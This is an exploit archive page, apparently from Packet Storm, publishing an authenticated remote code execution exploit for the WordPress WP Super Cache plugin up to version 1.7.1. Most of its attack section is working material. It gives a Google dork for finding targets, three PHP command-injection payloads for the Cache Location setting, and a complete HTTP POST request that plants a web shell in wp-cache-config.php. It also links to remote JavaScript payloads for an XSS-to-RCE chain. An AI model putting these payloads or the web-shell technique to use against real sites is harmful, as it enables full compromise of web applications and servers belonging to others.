exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress WP Super Cache 1.7.1 Remote Code Execution

WordPress WP Super Cache 1.7.1 Remote Code Execution
Posted Mar 29, 2021
Authored by m0ze

WordPress WP Super Cache plugin versions 1.7.1 and below suffer from a remote code execution vulnerability.

tags | exploit, remote, code execution
SHA-256 | 18a64716dacbf0e8c19c600cecb0946447c3ee415cd85fdf4b26eac64a846b13

WordPress WP Super Cache 1.7.1 Remote Code Execution

Change Mirror Download
# Exploit Title: WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated)
# Google Dork: inurl:/wp-content/plugins/wp-super-cache/
# Date: 2021-03-13
# Exploit Author: m0ze
# Version: <= 1.7.1
# Software Link: https://wordpress.org/plugins/wp-super-cache/


### -- [ Info: ]

[i] An Authenticated RCE vulnerability was discovered in the WP Super Cache plugin through 1.7.1 for WordPress.

[i] RCE due to input validation failure and weak $cache_path check in the WP Super Cache Settings -> Cache Location option. Direct access to the wp-cache-config.php file is not prohibited, so this vulnerability can be exploited for a web shell injection.

[i] Another possible attack vector: from XSS to RCE.

### -- [ Impact: ]

[~] Full compromise of the vulnerable web application and also web server.

### -- [ Payloads: ]

[$] ';system($_GET[13]);include_once \'wp-cache-config.php\';'

[$] ';`$_GET[13]`;include_once \'wp-cache-config.php\';?><!--

[$] ';`$_GET[13]`;#


### -- [ PoC #1 | Authenticated RCE | Cache Location: ]

[!] POST /wp-admin/options-general.php?page=wpsupercache&tab=settings
HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 501
Cookie: [cookies]

_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings&action=scupdates&wp_cache_enabled=1&wp_cache_mod_rewrite=0&wp_cache_not_logged_in=2&cache_rebuild_files=1&wp_cache_location=%2Fvar%2Fwww%2Fyour%2Fown%2Fpath%2Fexample.com%2Fwp-content%2Fcache%2F%27%3Bsystem%28%24_GET%5B13%5D%29%3Binclude_once+%5C%27wp-cache-config.php%5C%27%3B%27&_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings



### -- [ PoC #2 | From XSS to RCE | Cache Location: ]

[!] https://m0ze.ru/payload/wp-super-cache-rce.js

[!] https://m0ze.ru/payload/wp-super-cache-rce-j.js

Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close